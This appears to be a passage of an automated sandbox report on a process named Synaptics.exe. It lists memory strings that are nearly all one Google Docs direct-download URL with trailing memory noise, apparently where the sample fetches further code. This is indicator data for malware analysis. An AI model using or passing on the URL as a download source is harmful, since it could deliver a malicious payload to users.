                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000752C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000756C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbd
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbe
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc5
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc?
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcA
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcFh
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcdMsD
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcell
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadooo.
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoq
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp2#
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp;
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpData0E
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpE.xs
                                Source: Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpH
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpN.
                                Source: Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpx6
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp~
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...mU)pn
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr7
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrK
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrP
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrV
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrcBf
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadre
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadred.m
                                Source: Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrnia1
                                Source: Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrojec
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrontd
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrse
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsH
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsand.
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse
                                Source: Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsearc
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsers
                                Source: Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsh
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsk
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsp
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadst
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsu
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtD
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtI
                                Source: Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt_
                                Source: Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtacomJ
                                Source: Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadth
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleni
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleni/K
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleniDH%p.P
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu5
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu?
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduA
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaducati
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduluna
                                Source: Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadurce.5
                                Source: Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduserc
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu~
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000752C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000756C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv4rY
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvE
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvI
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvd
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadving
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvt1.#
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw?
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwAFs)
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadws
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwt
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx:
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxF
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxG
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxH
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxK
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxeTre
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                                Source: Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady:
                                Source: Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyD
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyY
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyn
                                Source: Synaptics.exe, 00000010.00000002.2302187436.000000001D7C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor...
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000756C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzg
